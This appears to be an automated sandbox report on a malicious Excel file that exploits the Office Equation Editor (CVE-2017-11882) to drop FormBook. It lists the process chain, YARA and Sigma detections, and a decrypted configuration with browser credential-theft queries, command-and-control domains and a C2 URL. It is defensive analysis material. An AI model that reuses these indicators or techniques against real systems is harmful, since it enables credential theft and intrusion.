Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order.xlsx

Overview

General Information

Sample Name:Purchase Order.xlsx
Analysis ID:344798
MD5:568ad30c526d3950e00385f41e08cdf2
SHA1:a2599b55c9c9a6b39c019bfeda57b38654c72f48
SHA256:ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2304 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 40BFB08CE97F3709F4DE7C6BA8B3401E)
      • acqyswhf.exe (PID: 2864 cmdline: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • dtz25z5e9sr.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p MD5: 535DD1329AEF11BF4654B3270F026D5B)
          • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • autofmt.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)
            • svchost.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
              • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa6e6bd38", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "xwwgj.com", "release-paypal.com", "investorshighway.com", "maglex.info", "chenangopistolpermit.com", "thebihareye.com", "sanjosemasks.com", "foremanmotors.com", "stadtstreicherin.com", "9247pf.com", "erenvincplatform.xyz", "cushcaps.com", "flatisteam.com", "kojyouibennto.com", "rahmatsuparman.com", "vallyfades.online", "metropitstop.com", "shopasha.com", "windycitycreditsolutions.com", "uproxysite.com", "californiabilling.com", "theexgirlfriendpics.com", "arnoldnaturalresources.com", "gfeets.com", "streamelemeants.com", "academiadacocriacao.com", "nselife.com", "maratinsaat.info", "deviurg.com", "mrbalumba.com", "joyfinancialservices.com", "retriever-home.com", "paydayonlineloanapplication.com", "dchasers.net", "mct.ltd", "geisshaven.com", "mdejgqbp.icu", "mercifulhandshc.com", "bmtxm.com", "aulbalu.com", "globuswarming.com", "wolfpacktowingrecovery.com", "empireofconsciousness.com", "yosyoshop.com", "l7zexitam.xyz", "lendtitle.com", "charmedlifeinteriors.com", "aimtopshop.com", "teramareprime.com", "muenker.world", "just-embrace.com", "amazon-co-jp.world", "fsjinhua.net", "lungi.cloud", "mysinglecam.com", "hortenserolland.com", "grouptripinsurance.com", "aspiringeyephotos.com", "shoesiin.com", "oodi.club", "shakhriyarmamedyarov.com", "musiklotteriet.com", "germanystablecoin.com", "land-il.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.chuanxingtong.com/j5an/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.acqyswhf.exe.220000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.acqyswhf.exe.220000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.acqyswhf.exe.220000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        5.2.acqyswhf.exe.220000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.acqyswhf.exe.220000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3024
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3024

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.acqyswhf.exe.220000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa6e6bd38", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeReversingLabs: Detection: 20%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order.xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJoe Sandbox ML: detected
          Source: 5.2.acqyswhf.exe.220000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
          Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004059F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,4_2_0040659C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
